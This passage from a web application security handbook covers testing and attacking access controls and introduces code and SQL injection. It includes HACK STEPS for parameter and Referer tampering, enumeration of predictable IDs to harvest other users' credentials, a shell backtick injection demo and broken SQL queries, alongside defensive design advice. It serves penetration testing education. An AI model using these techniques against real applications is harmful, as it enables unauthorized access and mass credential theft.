For example, an administrator using the application may see URLs like the

following:

https://wahh-app.com/login/home.jsp?admin=true

while the URLs seen by ordinary users contain a different parameter, or none

at all. Any user who is aware of the parameter assigned to administrators can

simply set it in his own requests and thereby gain access to administrative

functions.

This type of access control may sometimes be difficult to detect without

actually using the application as a high-privileged user and identifying what

requests are made. However, the techniques described in Chapter 4 for discovering

hidden request parameters may succeed in uncovering the mechanism even

when you are working only as an ordinary user.

In other unsafe access control models, the application uses the HTTP

Referer header as the basis for making access control decisions. For example,

an application may strictly control access to the main administrative menu,

based on a user’s privileges. But when a user makes a request for an individ-

ual administrative function, the application may simply check whether this

request was referred from the administrative menu page and assume that, if

so, then the user must have accessed that page and so have the required privileges.

This model is fundamentally broken, of course, because the Referer

header is completely within the control of the user and can be set to any value

at all.
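To see how little effort this takes, consider the following Python fragment, which uses the standard library's `urllib.request.Request` to build a request carrying a Referer of the caller's choosing. It is a minimal sketch: both URLs are hypothetical paths invented for the example, and the request is constructed but never sent.

```python
import urllib.request


def build_request_with_referer(url: str, referer: str) -> urllib.request.Request:
    """Build (without sending) a request whose Referer the caller controls."""
    return urllib.request.Request(url, headers={"Referer": referer})


req = build_request_with_referer(
    "https://wahh-app.com/admin/addUser.jsp",  # hypothetical admin function
    "https://wahh-app.com/admin/menu.jsp",     # hypothetical admin menu page
)
```

Nothing in the request proves that the client ever loaded the menu page, so a server that treats this header as evidence of privilege is trusting a value the attacker typed in.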

Attacking Access Controls

Before starting to probe the application to detect any actual access control vul-

nerabilities, you should take a moment to review the results of your applica-

tion mapping exercises (see Chapter 4), to understand what the application’s

actual requirements are in terms of access control, and therefore where it will

probably be most fruitful to focus your attention.

HACK STEPS

Questions to consider when examining an application’s access controls include:

■ Do application functions give individual users access to a particular sub-

set of data that belongs to them?

■ Are there different levels of user, such as managers, supervisors, guests,

and so on, who are granted access to different functions?

■ Do administrators use functionality that is built into the same application

in order to configure and monitor it?

■ What functions or data resources within the application have you

identified that would most likely enable you to escalate your current

privileges?

The easiest and most effective way to test an application’s access controls

is to access the application using different accounts, and

determine whether resources and functionality that can be accessed legiti-

mately by one account can be accessed illegitimately by another.

HACK STEPS

■ If the application segregates user access to different levels of functional-

ity, first use a powerful account to locate all of the available functionality

and then attempt to access this using a lower-privileged account.

■ If the application segregates user access to different resources (such as

documents), use two different user-level accounts to test whether access

controls are effective or whether horizontal privilege escalation is possi-

ble. Find a document that can be legitimately accessed by one user but

not by another, and attempt to access it using the second user’s

account — either by requesting the relevant URL or by submitting the

same POST parameters from within the second user’s session.

■ It may be possible to automate some of this testing by running a spider-

ing tool twice or more against the application, using a different user con-

text each time, and also in an unauthenticated context. To do this, run

the spider first as an administrator, and then obtain a session token for a

lower-privileged user and resubmit the same links but replace the privi-

leged session token with the lower-privileged token.

■ If a spidering session running as an ordinary user discovers privileged

functions to which only administrators should have access, then this may

represent a vulnerability. Note, however, that the effectiveness of this

method depends upon the exact behavior of the application: some appli-

cations provide all users with the same navigation links and return an

“access denied” message (in an HTTP 200 response) when an unautho-

rized function is requested.
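The resubmission step, including the caveat about "access denied" pages returned with an HTTP 200 status, might be sketched as follows in Python. This is an outline under stated assumptions rather than a finished tool: `fetch_low` is a hypothetical callable that requests a URL using the lower-privileged session token and returns the status code and body, and the denial markers are examples that you would replace with the wording the target application actually uses.

```python
from typing import Callable, Iterable, List, Tuple


def find_unprotected(
    urls: Iterable[str],
    fetch_low: Callable[[str], Tuple[int, str]],
    denied_markers: Iterable[str] = ("access denied", "not authorized"),
) -> List[str]:
    """Return URLs that a low-privileged session appears able to use.

    A 200 response whose body contains a denial marker is counted as a
    refusal, because some applications report authorization errors that way.
    """
    markers = [m.lower() for m in denied_markers]
    exposed = []
    for url in urls:
        status, body = fetch_low(url)
        refused = status != 200 or any(m in body.lower() for m in markers)
        if not refused:
            exposed.append(url)
    return exposed
```

Feed it the list of links gathered while spidering as an administrator. Every URL it returns still needs manual confirmation, since a page can load successfully yet omit the privileged content.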

If you have only one user-level account with which to access the application

(or none at all), then additional work needs to be done to test the effectiveness

of access controls. In fact, to perform a fully comprehensive test, further work

needs to be done in any case, because poorly protected functionality may exist

that is not explicitly linked from the interface of any application user — for

example, old functionality that has not yet been removed, or new functionality

that has been deployed but has not yet been published to users.

HACK STEPS

■ Use the content discovery techniques described in Chapter 4 to identify

as much of the application’s functionality as possible. Performing this

exercise as a low-privileged user is often sufficient to both enumerate

and gain direct access to sensitive functionality.

■ Where application pages are identified that are likely to present different

functionality or links to ordinary and administrative users (for example, a

Control Panel or My Home Page), try adding parameters like admin=true

to the URL query string and the body of POST requests, to determine

whether this uncovers or gives access to any functionality beyond what

your user context can normally access.

■ Test whether the application uses the Referer header as the basis for

making access control decisions. For key application functions that you

are authorized to access, try removing or modifying the Referer header

and determine whether your request is still successful. If not, the appli-

cation may be trusting the Referer header in an unsafe way.

■ Review all client-side HTML and scripts to find references to hidden func-

tionality or functionality that can be manipulated on the client side, such

as script-based user interfaces.
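Adding a candidate parameter to many URLs is tedious by hand. A small helper such as the following, built on Python's standard `urllib.parse` module, appends a name and value to a URL's query string while preserving any parameters already present. The function name and the example URLs in the note that follows are hypothetical; `admin=true` is simply the example value from the step above.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def with_extra_param(url: str, name: str = "admin", value: str = "true") -> str:
    """Return url with name=value appended to its query string."""
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    query.append((name, value))
    return urlunsplit(parts._replace(query=urlencode(query)))
```

For instance, a URL ending in `home.jsp?lang=en` gains `&admin=true`, and one with no query string gains `?admin=true`. The same name and value pair should also be tried in the body of POST requests.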

Once all accessible functionality has been enumerated, it is necessary to test

whether per-user segregation of access to resources is being correctly enforced.

In every instance where the application grants users access to a subset of a

wider range of resources of the same type (such as documents, orders, emails,

and personal details), there may be opportunities for one user to gain unau-

thorized access to other resources.

HACK STEPS

■ Where the application uses identifiers of any kind (document IDs,

account numbers, order references, etc.) to specify which resource a user

is requesting, attempt to discover the identifiers for resources to which

you do not have authorized access.

■ If it is possible to generate a series of such identifiers in quick succession

(for example, by creating multiple new documents or orders), use the same

techniques as were described in Chapter 7 for session tokens, to try to discover

any predictable sequences in the identifiers the application produces.

■ If it is not possible to generate any new identifiers, then you are

restricted to analyzing the identifiers that you have already discovered,

or even using plain guesswork. If the identifier has the form of a GUID, it

is unlikely that any attempts based on guessing will be successful. How-

ever, if it is a relatively small number, try other numbers in close range,

or random numbers with the same number of digits.

■ If access controls are found to be broken, and resource identifiers are

found to be predictable, you can mount an automated attack to harvest

sensitive resources and information from the application. Use the tech-

niques described in Chapter 13 to design a bespoke automated attack to

retrieve the data you require.

A catastrophic vulnerability of this kind occurs where an Account

Information page displays a user’s personal details together with his

username and password. While the password is typically masked on-screen,

it is nevertheless transmitted in full to the browser. Here, you can often

quickly iterate through the full range of account identifiers to harvest the

login credentials of all users. The accompanying figure shows Burp Intruder

being used to carry out a successful attack of this kind.
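Two of the simpler identifier checks described in these steps can be sketched in Python. The code is illustrative only and both function names are hypothetical: `constant_step` tests whether a series of numeric identifiers generated in quick succession rises by a fixed amount, and `neighbours` lists the values in close range of an identifier you have already seen. Real identifiers may follow more complex patterns that need the fuller analysis used for session tokens.

```python
from typing import List, Optional


def constant_step(ids: List[int]) -> Optional[int]:
    """Return the common difference if ids rise by a fixed step, else None."""
    if len(ids) < 3:
        return None  # too few samples to call it a pattern
    steps = {later - earlier for earlier, later in zip(ids, ids[1:])}
    return steps.pop() if len(steps) == 1 else None


def neighbours(known_id: int, radius: int = 5) -> List[int]:
    """Candidate identifiers within radius of one already observed."""
    return [known_id + delta for delta in range(-radius, radius + 1) if delta != 0]
```

A fixed step suggests that other users' identifiers can be computed directly. Failing that, the neighbouring values give a small, cheap set of guesses to submit first.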

TIP When you have detected an access control vulnerability, an immediate

attack to follow up with is to attempt to escalate your privileges further by

compromising a user account with administrative privileges. There are various

tricks you can use in trying to locate an administrative account. Using an

access control flaw like the one illustrated, you may harvest hundreds of user

credentials and not relish the task of logging in manually as every user until an

administrator is found. However, when accounts are identified by a sequential

numeric ID, it is very common to find that the lowest account numbers are

assigned to administrators. Logging in as the first few users who were

registered with the application will often identify an administrator. If this

approach fails, an effective method is to find a function within the application

where access is properly segregated horizontally — for example, the main home

page presented to each user. Write a script to log in using each set of captured

credentials, and then try to access your own home page. It is likely that

administrative users are able to view the home page of every user, so you will

immediately detect when an administrative account is being used.
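The scripted approach in this tip could take roughly the following shape in Python. Everything application-specific is left to two hypothetical callables that you would supply: `login` returns a session for a username and password (or `None` if the login fails), and `can_view_my_page` reports whether that session can load your own home page. Remove your own credentials from the list first, since your account will trivially pass the check.

```python
from typing import Callable, Iterable, List, Optional, Tuple


def find_admin_accounts(
    credentials: Iterable[Tuple[str, str]],
    login: Callable[[str, str], Optional[object]],
    can_view_my_page: Callable[[object], bool],
) -> List[str]:
    """Return usernames whose sessions can view the tester's own home page."""
    admins = []
    for username, password in credentials:
        session = login(username, password)
        if session is not None and can_view_my_page(session):
            admins.append(username)
    return admins
```

Because the home page is assumed to be properly segregated for ordinary users, any account that can load yours is a strong candidate for holding administrative privileges.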

In every instance where an application superficially appears to be enforcing

access controls effectively, you should probe further to determine whether any

defective assumptions have been made by developers.

HACK STEPS

■ Where an action is carried out in a multistep way, involving several dif-

ferent requests from client to server, test each request individually to

determine whether access controls have been applied to it.

■ Try to find any locations where the application is effectively assuming that

if you have reached a particular point, then you must have arrived via legiti-

mate means. Try to reach that point in other ways using a lower-privileged

account, to detect if any privilege escalation attacks are possible.

In cases where static resources that the application is protecting are ulti-

mately accessed directly via URLs to the resource files themselves, you should

test whether it is possible for unauthorized users to simply request these URLs

directly.

HACK STEPS

■ Step through the normal process for gaining access to a protected static

resource, to obtain an example of the URL by which it is ultimately

retrieved.

■ Using a different user context (for example, a less-privileged user or an

account that has not made a required purchase), attempt to access the

resource directly using the URL you have identified.

■ If this attack succeeds, try to understand the naming scheme being used

for protected static files. If possible, construct an automated attack to

trawl for content that may be useful or contain sensitive data (see

Chapter 13).

Securing Access Controls

Access controls are one of the easiest areas of web application security to

understand, although a well-informed, thorough methodology must be care-

fully applied when implementing them.

First, there are several obvious pitfalls to avoid. These usually arise from

ignorance about the essential requirements of effective access control or

flawed assumptions about the kinds of requests that users will make and

against which the application needs to defend itself:

■ Do not rely on users’ ignorance of application URLs or the identifiers used to specify application resources, such as account numbers and document IDs. Explicitly assume that users know every application URL and identifier, and ensure that the application’s access controls alone are sufficient to prevent unauthorized access.

■ Do not trust any user-submitted parameters to signify access rights (such as admin=true).

■ Do not assume that users will access application pages in the intended sequence. Do not assume that because users cannot access the Edit Users page, they will not be able to reach the Edit User X page that is linked from it.

■ Do not trust the user not to tamper with any data that is transmitted via the client. If some user-submitted data has been validated and is then transmitted via the client, do not rely upon the retransmitted value without revalidation.

The following represents a best-practice approach to implementing effective

access controls within web applications:

■ Explicitly evaluate and document the access control requirements for every unit of application functionality. This needs to include both who can legitimately use the function and what resources individual users may access via the function.

■ Drive all access control decisions from the user’s session.

■ Use a central application component to check access controls.

■ Process every single client request via this component, to validate that the user making the request is permitted to access the functionality and resources being requested.

■ Use programmatic techniques to ensure that there are no exceptions to the previous point. An effective approach is to mandate that every application page must implement an interface that is queried by the central access control mechanism. By forcing developers to explicitly code access control logic into every page, there can be no excuse for omissions.

■ For particularly sensitive functionality, such as administrative pages, you can further restrict access by IP address, to ensure that only users from a specific network range are able to access the functionality, regardless of their login status.

■ If static content needs to be protected, there are two methods of providing access control. First, static files can be accessed indirectly by passing a file name to a dynamic server-side page which implements relevant access control logic. Second, direct access to static files can be controlled using HTTP authentication or other features of the application server to wrap the incoming request and check the permissions for the resource before granting access.

■ Identifiers specifying which resource a user wishes to access are vulnerable to tampering whenever they are transmitted via the client. The server should trust only the integrity of server-side data. Any time these identifiers are transmitted via the client, they need to be revalidated to ensure the user is authorized to access the requested resource.

■ For security-critical application functions such as the creation of a new bill payee in a banking application, consider implementing per-transaction reauthentication and dual authorization to provide additional assurance that the function is not being used by an unauthorized party. This will also mitigate the consequences of other possible attacks, such as session hijacking.

■ Log every event where sensitive data is accessed or a sensitive action is performed. These logs will enable potential access control breaches to be detected and investigated.
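The central-component approach in the list above can be sketched roughly as follows. This is a minimal illustration, not a prescribed design: the `Page` interface, the `dispatch` function, the session dictionary layout, and the `ViewStatement` page are all hypothetical names chosen for the example.

```python
from abc import ABC, abstractmethod


class AccessDenied(Exception):
    """Raised by the central component when a request is not permitted."""


class Page(ABC):
    """Interface that every application page must implement (hypothetical)."""

    @abstractmethod
    def allowed_roles(self) -> frozenset:
        """Roles permitted to use this function at all."""

    @abstractmethod
    def may_access(self, session: dict, resource_id: str) -> bool:
        """Whether this session's user may access the requested resource."""

    @abstractmethod
    def render(self, session: dict, resource_id: str) -> str:
        """Produce the response once access has been granted."""


def dispatch(page: Page, session: dict, resource_id: str) -> str:
    """Central access control check applied to every request."""
    # Decisions are driven by server-side session data, never by request parameters.
    if session.get("role") not in page.allowed_roles():
        raise AccessDenied("role not permitted")
    # Identifiers arrive via the client, so they are revalidated on every request.
    if not page.may_access(session, resource_id):
        raise AccessDenied("resource not permitted")
    return page.render(session, resource_id)


class ViewStatement(Page):
    def allowed_roles(self) -> frozenset:
        return frozenset({"customer", "administrator"})

    def may_access(self, session: dict, resource_id: str) -> bool:
        # Customers see only their own account; administrators see any account.
        return session["role"] == "administrator" or resource_id == session["account_id"]

    def render(self, session: dict, resource_id: str) -> str:
        return f"statement for account {resource_id}"
```

Because `Page` is an abstract base class, a page that omits any of the three methods cannot be instantiated, which is one way of ensuring programmatically that no page escapes the central check.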

Web application developers often implement access control functions on a

piecemeal basis, adding code to individual pages in cases where they register

that some access control is required, and often cutting and pasting the same

code between pages to implement similar requirements. This approach carries

an inherent risk of defects in the resulting access control mechanism: many

cases are overlooked where controls are required, controls designed for one

area may not operate in the intended way in another area, and modifications

made elsewhere within the application may break existing controls by violat-

ing assumptions made by them.

In contrast to this approach, the previously described method of using a cen-

tral application component to enforce access controls has many benefits:

■ It increases the clarity of access controls within the application, enabling different developers to quickly understand the controls implemented by others.

■ It makes maintenance more efficient and reliable. Most changes will only need to be applied once, to a single shared component, and will not need to be cut and pasted to multiple locations.

■ It improves adaptability. Where new access control requirements arise, these can be easily reflected within an existing API implemented by each application page.

■ It results in fewer mistakes and omissions than if access control code is implemented piecemeal throughout the application.

A Multi-Layered Privilege Model

Issues relating to access apply not only to the web application itself but also to

the other infrastructure tiers which lie beneath it — in particular, the applica-

tion server, the database, and the operating system. Taking a defense-in-depth

approach to security entails implementing access controls at each of these lay-

ers to create several layers of protection. This provides greater assurance

against threats of unauthorized access, because if an attacker succeeds in com-

promising defenses at one layer, the attack may yet be blocked by defenses at

another layer.

In addition to implementing effective access controls within the web appli-

cation itself, as already described, a multi-layered approach can be applied in

various ways to the components which underlie the application, for example:

■ The application server can be used to control access to entire URL paths, on the basis of user roles that are defined at the application server tier.

■ The application can employ a different database account when carrying out the actions of different users. For users who should only be querying (and not updating) data, an account with read-only privileges should be used.

■ Fine-grained control over access to different database tables can be implemented within the database itself, using a table of privileges.

■ The operating system accounts used to run each component in the infrastructure can be restricted to the least powerful privileges that the component actually requires.

In a complex security-critical application, layered defenses of this kind can

be devised with the help of a matrix defining the different user roles within the

application and the different privileges, at each tier, that should be assigned to

each role. Figure 8-1 is a partial example of a privilege matrix for a complex

application.

Figure 8-1: Example of a privilege matrix for a complex application

Within a security model of this kind, you can see how various useful access

control concepts can be applied:

■ Programmatic control: The matrix of individual database privileges is stored in a table within the database, and applied programmatically to enforce access control decisions. The classification of user roles provides a shortcut for applying certain access control checks, and this is also applied programmatically. Programmatic controls can be extremely fine-grained and can build arbitrarily complex logic into the process of carrying out access control decisions within the application.

■ Discretionary access control (DAC): Administrators are able to delegate their privileges to other users in relation to specific resources that they own, employing discretionary access control. This is a closed DAC model, in which access is denied unless explicitly granted. Administrators are also able to lock or expire individual user accounts. This is an open DAC model, in which access is permitted unless explicitly withdrawn. Various application users have privileges to create user accounts, again applying discretionary access control.

■ Role-based access control (RBAC): There are named roles, which contain different sets of specific privileges, and each user is assigned to one of these roles. This serves as a shortcut for assigning and enforcing different privileges and is necessary to help manage access control in complex applications. Using roles to perform upfront access checks on user requests enables many unauthorized requests to be quickly rejected with a minimum amount of processing being performed. An example of this approach is in protecting the URL paths that specific types of user may access.

  When designing role-based access control mechanisms, it is necessary to balance the number of roles so that they remain a useful tool to assist in the management of privileges within the application. If too many fine-grained roles are created, then the number of different roles becomes unwieldy, and they are difficult to manage accurately. If too few roles are created, the resulting roles will be a coarse instrument for managing access, and it is likely that individual users will be assigned privileges that are not strictly necessary for performance of their function.

■ Declarative control: The application uses restricted database accounts when accessing the database. It employs different accounts for different groups of users, with each account having the lowest level of privilege necessary for carrying out the actions which that group is permitted to perform. Declarative controls of this kind are declared from outside the application. This is a very useful application of defense-in-depth principles, because privileges are being imposed on the application by a different component. Even if a user finds a means of breaching the access controls implemented within the application tier, so as to perform a sensitive action such as adding a new user, they will be prevented from doing so because the database account that they are using does not have the required privileges within the database.

  A different means of applying declarative access control exists at the application server level, via deployment descriptor files, which are applied during application deployment. However, these can be relatively blunt instruments and do not always scale well to manage fine-grained privileges in a large application.
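To make the idea of a privilege matrix more concrete, the following sketch shows one way such a matrix might be represented and queried in code. The roles, URL prefixes, database account names, and table privileges are all invented for illustration; this is not a reconstruction of Figure 8-1.

```python
# Hypothetical roles, URL prefixes, database accounts and table privileges.
PRIVILEGE_MATRIX = {
    "administrator": {
        "url_prefixes": ("/admin/", "/account/"),
        "db_account": "app_admin",
        "tables": {
            "users": {"SELECT", "INSERT", "UPDATE", "DELETE"},
            "orders": {"SELECT", "UPDATE"},
        },
    },
    "customer": {
        "url_prefixes": ("/account/",),
        "db_account": "app_readonly",
        "tables": {"orders": {"SELECT"}},
    },
}


def url_allowed(role: str, path: str) -> bool:
    """Upfront role check: reject requests for paths outside the role's prefixes."""
    entry = PRIVILEGE_MATRIX.get(role)
    return entry is not None and path.startswith(entry["url_prefixes"])


def table_privilege_allowed(role: str, table: str, privilege: str) -> bool:
    """Fine-grained check; access is denied unless explicitly granted."""
    entry = PRIVILEGE_MATRIX.get(role, {})
    return privilege in entry.get("tables", {}).get(table, set())


def db_account_for(role: str) -> str:
    """Database account the application should connect with for this role."""
    return PRIVILEGE_MATRIX[role]["db_account"]
```

The role-based URL check is cheap and can reject many requests early, while the per-table lookup corresponds to the finer-grained programmatic control. The separate database account per role is what allows the database itself to impose restrictions from outside the application.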

HACK STEPS

If you are attacking an application that employs a multi-layered privilege model

of this kind, it is likely that many of the most obvious mistakes that are

commonly made in applying access controls will be defended against. You may

find that circumventing the controls implemented within the application does

not get you very far, because of protection in place at other layers. With this in

mind, there are still several potential lines of attack available to you. Most

importantly, understanding the limitations of each type of control, in terms of

the protection that it does not offer, will help you to identify the vulnerabilities

that are most likely to affect it:

■ Programmatic checks within the application layer may be susceptible to

injection-based attacks.

■ Roles defined at the application server layer are often coarsely defined

and may be incomplete.

■ Where application components run using low-privileged operating sys-

tem accounts, these are still typically able to read many kinds of poten-

tially sensitive data within the host file system. Any vulnerabilities

granting arbitrary file access may still be usefully exploited.

■ Vulnerabilities within the application server software itself will typically

enable you to defeat all access controls implemented within the applica-

tion layer, but you may still have limited access to the database and

operating system.

■ A single exploitable access control vulnerability in the right location may

still provide a starting point for serious privilege escalation. For example,

if you discover a way to modify the role associated with your account,

then you may find that logging in again with that account gives you

enhanced access at both the application and database layers.

Chapter Summary

Access control defects can manifest themselves in various ways. In some cases,

they may be uninteresting, allowing illegitimate access to a harmless function

that cannot be leveraged to escalate privileges any further. In other cases, find-

ing a weakness in access controls can quickly lead to a complete compromise

of the application.

Flaws in access control can arise from various sources: a poor application

design may make it difficult or impossible to check for unauthorized access, a

simple oversight may leave only one or two functions unprotected, or defec-

tive assumptions about the way users will behave can leave the application

undefended when those assumptions are violated.

In many cases, finding a break in access controls is almost trivial — you sim-

ply request a common administrative URL and gain direct access to the func-

tionality. In other cases, it may be very hard, and subtle defects may lurk deep

within application logic, particularly in complex, high-security applications.

The most important lesson when attacking access controls is to look every-

where. If you are struggling to make progress, be patient and test every single

step of every application function. A bug that allows you to own the entire

application may be just around the corner.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. An application may use the HTTP Referer header to control access

without any overt indication of this in its normal behavior. How can

you test for this weakness?

2. You log in to an application and are redirected to the following URL:

https://wahh-app.com/MyAccount.php?uid=1241126841

The application appears to be passing a user identifier to the

MyAccount.php page. The only identifier you are aware of is your

own. How can you test whether the application is using this

parameter to enforce access controls in an unsafe way?

3. A web application on the Internet enforces access controls by examining

users’ source IP addresses. Why is this behavior potentially flawed?

4. An application’s sole purpose is to provide a searchable repository of

information for use by members of the public. There are no authentica-

tion or session-handling mechanisms. What access controls should be

implemented within the application?

5. You are browsing an application and encounter several sensitive

resources that ought to be protected from unauthorized access, and that

have the .xls file extension. Why should these immediately catch your

attention?

CHAPTER 9

Injecting Code

The topic of code injection is a huge one, encompassing dozens of different languages and environments, and a wide variety of different attacks. It would be possible to write an entire book on any one of these areas, exploring all of the theoretical subtleties of how vulnerabilities can arise and be exploited. Because this is a practical handbook, we will focus fairly ruthlessly on the knowledge and techniques that you will need in order to exploit the code injection flaws that exist in real-world applications.

SQL injection is the elder statesman of code injection attacks: it is still one of the more prevalent vulnerabilities in the wild, and frequently one of the most devastating. It is also a highly fertile area of current research, and we will explore in detail all of the latest attack techniques, including filter bypasses, inference-based attacks, and fully blind exploitation.

We will also examine a host of other common code injection vulnerabilities, including injection into web scripting languages, SOAP, XPath, email, LDAP, and the server operating system. In each case, we will describe the practical steps that you can take to identify and exploit these defects. There is a conceptual synergy in the process of understanding each new type of injection. Having grasped the essentials of exploiting these half-dozen manifestations of the flaw, you should be confident that you can draw on this understanding when you encounter a new category of injection, and indeed devise additional means of attacking those that others have already studied.

Injecting into Interpreted Languages

An interpreted language is one whose execution involves a runtime compo-

nent that interprets the code of the language and carries out the instructions

that it contains. In contrast to this, a compiled language is one whose code is

converted into machine instructions at the time of generation; at runtime,

these instructions are then executed directly by the processor of the computer

that is running it.

In principle, any language can be implemented using either an interpreter

or a compiler, and the distinction is not an inherent property of the language

itself. Nevertheless, most languages are normally implemented in only one of

these two ways, and many of the core languages used in the development of

web applications are implemented using an interpreter, including SQL, LDAP,

Perl, and PHP.

Because of the way that interpreted languages are executed, there arises a

family of vulnerabilities known as code injection. In any useful application,

user-supplied data will be received, manipulated, and acted upon. The code

that is processed by the interpreter will, therefore, comprise a mix of the

instructions written by the programmer and the data supplied by the user. In

some situations, an attacker can supply crafted input that breaks out of the

data context, usually by supplying some syntax that has a special significance

within the grammar of the interpreted language being used. The result is that

part of this input gets interpreted as program instructions, which are executed

in the same way as if they had been written by the original programmer. Often,

therefore, a successful attack will fully compromise the component of the

application that is being targeted.

In compiled languages, on the other hand, attacks designed to execute arbi-

trary commands are usually very different. The method for injecting code does

not normally leverage any syntactic feature of the language used to develop

the target program, and the injected payload normally contains machine code

rather than instructions written in that language. See Chapter 15 for details of

common attacks against compiled software.

Consider the following very simple example. Helloworld is a shell script

that prints out a message supplied by the user:

#!/bin/bash

echo $1

When used in the way the programmer intended, this script simply takes the

input supplied by the user and passes this to the echo command, for example:

[manicsprout@localhost ~]$ ./helloworld.sh "hello there"

hello there

However, the shell scripting environment in which Helloworld is inter-

preted supports the use of backticks to insert the output of a different com-

mand within an item of data. Hence, an attacker can inject arbitrary script

commands, and retrieve their output, as follows:

[manicsprout@localhost ~]$ ./helloworld.sh "`ls -la`"

total 28 drwxr-xr-x 2 manicsprout manicsprout 4096 Dec 4 00:22 .

drwxr-xr-x 3 root root 4096 Dec 4 00:19 .. -rw-r--r-- 1 manicsprout

manicsprout 24 Dec 4 00:19 .bash_logout -rw-r--r-- 1 manicsprout

manicsprout 191 Dec 4 00:19 .bash_profile -rw-r--r-- 1 manicsprout

manicsprout 124 Dec 4 00:19 .bashrc -rw------- 1 manicsprout manicsprout

706 Dec 4 00:22 .viminfo -rw-rw-r-- 1 manicsprout manicsprout 8 Dec 4

00:22 helloworld.sh

Although this example is somewhat trivial, if the vulnerable script were exe-

cuting as root, an attacker could leverage it to escalate privileges and execute

commands in the context of the root user. As you will see, this exact vulnera-

bility is still often found in web applications that interface with the operating

system command shell.
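The same class of flaw can be reproduced from application code that passes user input to the command shell. The sketch below is an illustration only, assuming a POSIX-like system with `/bin/sh` and an `echo` program available; the function names are hypothetical. It contrasts building a command line by string concatenation with passing the input as a separate argument that no shell ever interprets.

```python
import subprocess


def greet_unsafe(message: str) -> str:
    """Build a shell command line by concatenation (vulnerable)."""
    # The shell parses the whole string, so backticks inside `message`
    # are treated as command substitution rather than as data.
    result = subprocess.run(
        "echo " + message, shell=True, capture_output=True, text=True
    )
    return result.stdout.strip()


def greet_safe(message: str) -> str:
    """Pass the message as a single argument, with no shell involved."""
    result = subprocess.run(["echo", message], capture_output=True, text=True)
    return result.stdout.strip()


payload = "`echo INJECTED`"
print(greet_unsafe("hello there"))  # behaves as the programmer intended
print(greet_unsafe(payload))        # the injected command is executed
print(greet_safe(payload))          # the payload is echoed back as plain data
```

In the unsafe variant, the output contains the result of the injected command. In the second variant, the backticks reach `echo` unchanged because no interpreter ever parses them.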

HACK STEPS

Injection into interpreted languages is a very broad topic, encompassing many

different kinds of vulnerability and potentially affecting every component of a

web application’s supporting infrastructure. The detailed steps for detecting

and exploiting code injection flaws are dependent upon the language that is

being targeted and the programming techniques employed by the application’s

developers. In every instance, however, the generic approach is as follows:

■ Supply unexpected syntax that may cause problems within the context of

the particular interpreted language.

■ Identify any anomalies in the application’s response that may indicate

the presence of a code injection vulnerability.

■ If any error messages are received, examine these to obtain evidence

about the problem that occurred on the server.

■ If necessary, systematically modify your initial input in relevant ways

in an attempt to confirm or disprove your tentative diagnosis of a

vulnerability.

■ Construct a proof-of-concept test that causes a safe command to be exe-

cuted in a verifiable way, to conclusively prove that an exploitable code

injection flaw exists.

■ Exploit the vulnerability by leveraging the functionality of the target lan-

guage and component to achieve your objectives.

Injecting into SQL

Almost every web application employs a database to store the various kinds of

information that it needs in order to operate. For example, a web application

deployed by an online retailer might use a database to store the following

information:

■ User accounts, credentials, and personal information

■ Descriptions and prices of goods for sale

■ Orders, account statements, and payment details

■ The privileges of each user within the application

The means of accessing information within the database is Structured Query

Language, or SQL. SQL can be used to read, update, add, and delete informa-

tion held within the database.

SQL is an interpreted language, and web applications commonly construct

SQL statements that incorporate user-supplied data. If this is done in an unsafe

way, then the application may be vulnerable to SQL injection. This flaw is one

of the most notorious vulnerabilities to have afflicted web applications. In the

most serious cases, SQL injection can enable an anonymous attacker to read

and modify all data stored within the database, and even take full control of

the server on which the database is running.

As awareness of web application security has evolved, SQL injection vul-

nerabilities have become gradually less widespread, and more difficult to

detect and exploit. A few years ago, it was very common to encounter SQL

injection vulnerabilities that could be detected simply by entering an apostrophe

into an HTML form field, and reading the verbose error message that the

application returned. Today, vulnerabilities are more likely to be tucked away

in data fields that users cannot normally see or modify, and error messages are

likely to be generic and uninformative. As this trend has developed, methods

for finding and exploiting SQL injection flaws have evolved, using more sub-

tle indicators of vulnerabilities, and more refined and powerful exploitation

techniques. We will begin by examining the most basic cases and then go on to

describe the latest techniques for blind detection and exploitation.

There is a very wide range of databases in use to support web applications.

While the fundamentals of SQL injection are common to the vast majority of

these, there are many differences. These range from minor variations in syntax

through to significant divergences in behavior and functionality that can affect

the types of attack that you can pursue. For reasons of space and sanity, we

will restrict our actual examples to the three most common databases you are

likely to encounter, namely Oracle, MS-SQL, and MySQL. Wherever applica-

ble, we will draw attention to the differences between these three platforms.

Equipped with the techniques we describe here, you should be able to identify

and exploit SQL injection flaws against any other database, by performing

some quick additional research.

TIP In many situations, you will find it extremely useful to have access to a

local installation of the same database that is being used by the application

you are targeting. You will often find that you need to tweak a piece of syntax,

or consult a built-in table or function, to achieve your objectives. The responses

you receive from the target application will often be incomplete or cryptic,

requiring some detective work to understand. All of this is much easier if you

can cross-reference with a fully transparent working version of the database in

question.

If this is not feasible, a good alternative is to find a suitable interactive online

environment that you can experiment on, such as the interactive tutorials at

SQLzoo.net.

Exploiting a Basic Vulnerability

Consider a web application deployed by a book retailer that enables users to

search for products based on author, title, publisher, and so on. The entire book

catalog is held within a database, and the application uses SQL queries to

retrieve details of different books based on the search terms supplied by users.

When a user searches for all books published by Wiley, the application per-

forms the following query:

SELECT author,title,year FROM books WHERE publisher = 'Wiley'

This query causes the database to check every row within the books table,

extract each of the records where the publisher column has the value Wiley,

and return the set of all these records. This record set is then processed by the

application and presented to the user within an HTML page.

In this query, the words to the left of the equals sign comprise SQL key-

words and the names of tables and columns within the database. All of this

portion of the query was constructed by the programmer at the time the application

was created. The expression Wiley, of course, is supplied by the user,

and its significance is as an item of data. String data in SQL queries must be

encapsulated within single quotation marks, to separate it from the rest of the

query.

Now, consider what happens when a user searches for all books published

by O’Reilly. This causes the application to perform the following query:

SELECT author,title,year FROM books WHERE publisher = 'O'Reilly'

In this case, the query interpreter reaches the string data in the same way as

before. It parses this data, which is encapsulated within single quotation

marks, and obtains the value O. It then encounters the expression Reilly',

which is not valid SQL syntax and so generates an error:

Incorrect syntax near 'Reilly'.

Server: Msg 105, Level 15, State 1, Line 1

Unclosed quotation mark before the character string '
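The way the application arrives at this broken query can be reproduced with a few lines of code. The sketch below is a minimal illustration using Python's built-in `sqlite3` module, which is an assumption made for convenience rather than one of the databases discussed in this chapter, so the wording of the error differs from the message shown above. The `build_query` and `search` functions and the sample rows are invented for the example.

```python
import sqlite3


def build_query(publisher: str) -> str:
    # Unsafe by design: the user-supplied value is pasted between single quotes.
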